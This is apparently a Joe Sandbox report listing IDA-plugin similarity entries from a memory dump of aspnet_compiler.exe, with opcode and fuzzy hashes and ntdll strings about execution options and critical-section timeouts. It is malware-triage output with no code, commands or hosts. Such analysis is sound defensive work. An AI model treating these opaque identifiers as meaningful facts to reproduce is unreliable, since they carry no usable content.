                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                                          • Instruction ID: 98ffafbc3d21ccd6e4cb98983fa4649976df520403475d96183b19ef534b6c1f
                                                                                                                                                          • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                                          • Instruction Fuzzy Hash: B7D012371D054DBBCB119F66DC01F957BA9E764BA0F444020B5088B5A0C63AE950D684
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 6d3087285429f34db3d93285f208cc6f499d4a17ac404ec2209683ebc00a4871
                                                                                                                                                          • Instruction ID: 6984727a3d6b528be6890069eb1a5d3f4903e4722a9b2525f4ff69ee4aa9f4bf
                                                                                                                                                          • Opcode Fuzzy Hash: 6d3087285429f34db3d93285f208cc6f499d4a17ac404ec2209683ebc00a4871
                                                                                                                                                          • Instruction Fuzzy Hash: DFD0A734505145CBEF1ADF18C614DAEB6B4FB10A44B4000BCF7C051120D326DC41CB54
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                                          • Instruction ID: 5781eeb6f92ac826562317008e3cb0eeb6d081da10487973e35d0a2c26995836
                                                                                                                                                          • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                                          • Instruction Fuzzy Hash: 7EC01232290648AFC712AA99CD01F427BA9EBA8B50F000021F2088B670C631E820EA84
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                          • Instruction ID: 8a0299e527ac93b11fb9dc7cf7e412a694bedb6f5ae9e333479495912cda228b
                                                                                                                                                          • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                          • Instruction Fuzzy Hash: 5FD01236100248EFCB01DF41C890D9AB72AFBD8710F108019FD19077108A31ED62DA50
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                                          • Instruction ID: 67f8576f5b7fb3120f43ead73f0daa08fc5429b055b2891ca37736680c6f1eaa
                                                                                                                                                          • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                                          • Instruction Fuzzy Hash: E9C04C757015458FCF15EB59D294F8577E4F754740F1508D0E945CB721E624E901CA10
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 4d7af243267e57c29be510a9b8e4af835df5a6adc7abc06fc286bb807030a1ed
                                                                                                                                                          • Instruction ID: 7d11d401891c6740e6ce6b098accef6061e09c1846247eece13de332d64aab50
                                                                                                                                                          • Opcode Fuzzy Hash: 4d7af243267e57c29be510a9b8e4af835df5a6adc7abc06fc286bb807030a1ed
                                                                                                                                                          • Instruction Fuzzy Hash: 2A900271B0580012A14071D888945464005A7F0302B95C012E0824554CCA148A565361
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 2263b8b86d597ff74591111435bc6a67110e49ffde2fe486008ca0abcc2b5bb4
                                                                                                                                                          • Instruction ID: f1b07be062bc74de714e058ea85834b85780227216aa9999121c55ec709dc7f6
                                                                                                                                                          • Opcode Fuzzy Hash: 2263b8b86d597ff74591111435bc6a67110e49ffde2fe486008ca0abcc2b5bb4
                                                                                                                                                          • Instruction Fuzzy Hash: 889002A1B0150042514071D888144066005A7F13023D5C116A0954560CC61889559369
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 40c40e8a6e8b61549bec4089b8b11ceacb9bee516488402187dfa7b8a03eaeaf
                                                                                                                                                          • Instruction ID: 98b13886916653a06ccc92f22123f5ee3fe3303cbcfdde3dbd3b154dc644d7f4
                                                                                                                                                          • Opcode Fuzzy Hash: 40c40e8a6e8b61549bec4089b8b11ceacb9bee516488402187dfa7b8a03eaeaf
                                                                                                                                                          • Instruction Fuzzy Hash: F090027170140802E10471D88814686000597E0302F95C012A6424655ED66589917231
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 9b496fbdda7356a4a7f2f8ab3447a7e22bdd34e23a2697e69fab81088a89c08d
                                                                                                                                                          • Instruction ID: 8d3655679691dd312e2411bee3187a6850ba9929c1f28864e2331227312c4e44
                                                                                                                                                          • Opcode Fuzzy Hash: 9b496fbdda7356a4a7f2f8ab3447a7e22bdd34e23a2697e69fab81088a89c08d
                                                                                                                                                          • Instruction Fuzzy Hash: 0B90027170140403E10071D89518707000597E0202F95D412A0824558DD65689516221
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 06e041381be9afd7577aacf4c6b600702640736183db99707ce7c95f1c3bf01b
                                                                                                                                                          • Instruction ID: 17ed32a63dfae7758baa48e75a9805f0d898c2edec1ce75ccbcb1e1c0b3463fc
                                                                                                                                                          • Opcode Fuzzy Hash: 06e041381be9afd7577aacf4c6b600702640736183db99707ce7c95f1c3bf01b
                                                                                                                                                          • Instruction Fuzzy Hash: D59002A174140442E10071D88424B060005D7F1302F95C016E1464554DC619CD526226
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: eb3659e881ee613c0b2db7484d8de902c9914a0e9480be4b34f5d200387e3f03
                                                                                                                                                          • Instruction ID: bee19015de1d69169ee99987c1bf5f9a657ca8d559a4e3e7dfed56fdb6517c76
                                                                                                                                                          • Opcode Fuzzy Hash: eb3659e881ee613c0b2db7484d8de902c9914a0e9480be4b34f5d200387e3f03
                                                                                                                                                          • Instruction Fuzzy Hash: 589002A171140042E10471D88414706004597F1202F95C013A2554554CC5298D615225
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 4c1211bfc4c7fbe20d132a0f7d351a84cf7b093f29863b1566cd37e4586d1e08
                                                                                                                                                          • Instruction ID: c94faad65ecfe3e2055ac58c9fa24ec63377dd878e77fd43c5d28f77bf185263
                                                                                                                                                          • Opcode Fuzzy Hash: 4c1211bfc4c7fbe20d132a0f7d351a84cf7b093f29863b1566cd37e4586d1e08
                                                                                                                                                          • Instruction Fuzzy Hash: 2090027170180402E10071D8882470B000597E0303F95C012A1564555DC62589516671
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 06a7333a5202a3d6dd12d6e8874d103a8560867d0c6c50ff9b8a069c0f8e8108
                                                                                                                                                          • Instruction ID: 425d8f2f3efb5e72eb4ba897b1d06d86798af5ea50113f7a5764477e0f2c2ee3
                                                                                                                                                          • Opcode Fuzzy Hash: 06a7333a5202a3d6dd12d6e8874d103a8560867d0c6c50ff9b8a069c0f8e8108
                                                                                                                                                          • Instruction Fuzzy Hash: 2690027170180402E10071D88818747000597E0303F95C012A5564555EC665C9916631
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: d2f02ad3538f695e4e5ff5ec1debb982a65f5f40ed279e08d88b9422c815b1f0
                                                                                                                                                          • Instruction ID: 19152a8f698cc55aedba6cd68378965d6f8ee4c77fe3e8e8f6aab157757d762a
                                                                                                                                                          • Opcode Fuzzy Hash: d2f02ad3538f695e4e5ff5ec1debb982a65f5f40ed279e08d88b9422c815b1f0
                                                                                                                                                          • Instruction Fuzzy Hash: 9A900261B0140042514071E8C8549064005BBF1212795C122A0D98550DC55989655765
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 9d2076d8478c82b1cf1cdbbe38711be7926f691997fe61df6fffb48ee837ebc1
                                                                                                                                                          • Instruction ID: e7d2c3d4fd9499b54e33143da1faba95c7338b4dcb88d5689eeb8fca280d5a61
                                                                                                                                                          • Opcode Fuzzy Hash: 9d2076d8478c82b1cf1cdbbe38711be7926f691997fe61df6fffb48ee837ebc1
                                                                                                                                                          • Instruction Fuzzy Hash: DC900261711C0042E20075E88C24B07000597E0303F95C116A0554554CC91589615621
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: d3e7d4e72ebe36f85f8a4a6bf696b650b03c8b0fe5c5db3ff342f80bfe9c5fa9
                                                                                                                                                          • Instruction ID: 73c423b269d1c00697147d0aef323ddd05c1e81d02eb24854d82842d1d908ca7
                                                                                                                                                          • Opcode Fuzzy Hash: d3e7d4e72ebe36f85f8a4a6bf696b650b03c8b0fe5c5db3ff342f80bfe9c5fa9
                                                                                                                                                          • Instruction Fuzzy Hash: A090026170140402E10271D884246060009D7E1346FD5C013E1824555DC6258A53A232
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: e29e614f9dc9977e273e52e7890d60de8f855d4bad901c5a8fed7f94214f1077
                                                                                                                                                          • Instruction ID: b63b48873cc1882c1bdf5b4114845130b681d7dc96796d309bb4860354435f6f
                                                                                                                                                          • Opcode Fuzzy Hash: e29e614f9dc9977e273e52e7890d60de8f855d4bad901c5a8fed7f94214f1077
                                                                                                                                                          • Instruction Fuzzy Hash: 3D900261B0140502E10171D88414616000A97E0242FD5C023A1424555ECA258A92A231
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 53a60f1b347c1bf9be64cc9d36fd2f0028b48cd12588132f6bac8f5b68bf481b
                                                                                                                                                          • Instruction ID: 586c809fc273f0baad0c35c8fedd5bc46e393bbb10ea97a3578e13c2aeffa001
                                                                                                                                                          • Opcode Fuzzy Hash: 53a60f1b347c1bf9be64cc9d36fd2f0028b48cd12588132f6bac8f5b68bf481b
                                                                                                                                                          • Instruction Fuzzy Hash: 039002B170140402E14071D88414746000597E0302F95C012A5464554EC6598ED56765
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 15ec8794942cc79617f763519a6b650a86de3c9ec037544acfe34e5f8a7d441a
                                                                                                                                                          • Instruction ID: bdcf193e38581623a8d035b9086a6e730f379a1784c9e576428538a108f2e5d4
                                                                                                                                                          • Opcode Fuzzy Hash: 15ec8794942cc79617f763519a6b650a86de3c9ec037544acfe34e5f8a7d441a
                                                                                                                                                          • Instruction Fuzzy Hash: 099002A170180403E14075D88814607000597E0303F95C012A2464555ECA298D516235
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                          • API String ID: 48624451-2108815105
                                                                                                                                                          Strings
                                                                                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 010C46FC
                                                                                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 010C4725
                                                                                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 010C4787
                                                                                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 010C4742
                                                                                                                                                          • ExecuteOptions, xrefs: 010C46A0
                                                                                                                                                          • Execute=1, xrefs: 010C4713
                                                                                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 010C4655
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                          • API String ID: 0-484625025
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __aulldvrm
                                                                                                                                                          • String ID: +$-$0$0
                                                                                                                                                          • API String ID: 1302938615-699404926
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                          • String ID: %%%u$[$]:%u
                                                                                                                                                          • API String ID: 48624451-2819853543
                                                                                                                                                          Strings
                                                                                                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 010C02BD
                                                                                                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 010C02E7
                                                                                                                                                          • RTL: Re-Waiting, xrefs: 010C031E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                          • API String ID: 0-2474120054
                                                                                                                                                          Strings
                                                                                                                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 010C7B7F
                                                                                                                                                          • RTL: Resource at %p, xrefs: 010C7B8E
                                                                                                                                                          • RTL: Re-Waiting, xrefs: 010C7BAC
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                          • API String ID: 0-871070163
                                                                                                                                                          • Opcode ID: 7f97f9d050caa77e53f343c4435cdf286d51db248c1dbd0b8ba2648d93def852
                                                                                                                                                          • Instruction ID: f002c1d71c3644a522d6ecd84b35e39eb14ef2fe1a04d9a2630f316c9d37c65a
                                                                                                                                                          • Opcode Fuzzy Hash: 7f97f9d050caa77e53f343c4435cdf286d51db248c1dbd0b8ba2648d93def852
                                                                                                                                                          • Instruction Fuzzy Hash: D841E3357047029FD721EF29C840B6ABBE5EF98710F100A5DF9D69B281DB71E4058F91
                                                                                                                                                          APIs
                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010C728C
                                                                                                                                                          Strings
                                                                                                                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 010C7294
                                                                                                                                                          • RTL: Resource at %p, xrefs: 010C72A3
                                                                                                                                                          • RTL: Re-Waiting, xrefs: 010C72C1
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                          • API String ID: 885266447-605551621
                                                                                                                                                          • Opcode ID: 09ab0720f2743c95e19eff21da273d6e025e87bdd3697fef3b60eecab5584c46
                                                                                                                                                          • Instruction ID: 86dacd0d6d1e29d47b68c1d1488e0bf22fbc5f4d81d7d6534f7b766dd715bb72
                                                                                                                                                          • Opcode Fuzzy Hash: 09ab0720f2743c95e19eff21da273d6e025e87bdd3697fef3b60eecab5584c46
                                                                                                                                                          • Instruction Fuzzy Hash: 0A41E231744607ABD721DF29CC41B6AB7E6FB94B20F14461DF9D5AB240DB21E8428FD1
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                          • String ID: %%%u$]:%u
                                                                                                                                                          • API String ID: 48624451-3050659472
                                                                                                                                                          • Opcode ID: 20dc0040a066d315ae9ddf75e2749d5644c93998fea171626e21d1d4ca38a6a4
                                                                                                                                                          • Instruction ID: 3924f2fc24532d18d8a92e679655e7c4ca3482dd2e92a6295ba16d8d0f5f5cf0
                                                                                                                                                          • Opcode Fuzzy Hash: 20dc0040a066d315ae9ddf75e2749d5644c93998fea171626e21d1d4ca38a6a4
                                                                                                                                                          • Instruction Fuzzy Hash: D3318872A002199FDB25DF2DCC44BEEB7F8EB44610F444559E949D7240EB709A448B60
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __aulldvrm
                                                                                                                                                          • String ID: +$-
                                                                                                                                                          • API String ID: 1302938615-2137968064
                                                                                                                                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                                          • Instruction ID: aa3f57097edb1a238069eb382dec08929cbfdc58e9a3e197d0c46f457dee2b57
                                                                                                                                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                                          • Instruction Fuzzy Hash: F991A372E1020A9BEF64DF6DC8B16BEBBF5AF84720F14455AE9D5A72C0D7308940AF11
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: $$@
                                                                                                                                                          • API String ID: 0-1194432280
                                                                                                                                                          • Opcode ID: e8415389d11bf9b60955b007b4d4b1bf96fc1bfbaad85907c767cdde2bb3e3d9
                                                                                                                                                          • Instruction ID: 050dd25d7a0c8c435ca52c7c64bfe9adb428acdc742548181c98764cdf585374
                                                                                                                                                          • Opcode Fuzzy Hash: e8415389d11bf9b60955b007b4d4b1bf96fc1bfbaad85907c767cdde2bb3e3d9
                                                                                                                                                          • Instruction Fuzzy Hash: 248129B1D00269DBDB75DB54CC44BEEBBB8AB48754F0041EAEA59B7240D7309E84CFA4
                                                                                                                                                          APIs
                                                                                                                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 010DCFBD
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CallFilterFunc@8
                                                                                                                                                          • String ID: @$@4Cw@4Cw
                                                                                                                                                          • API String ID: 4062629308-3101775584
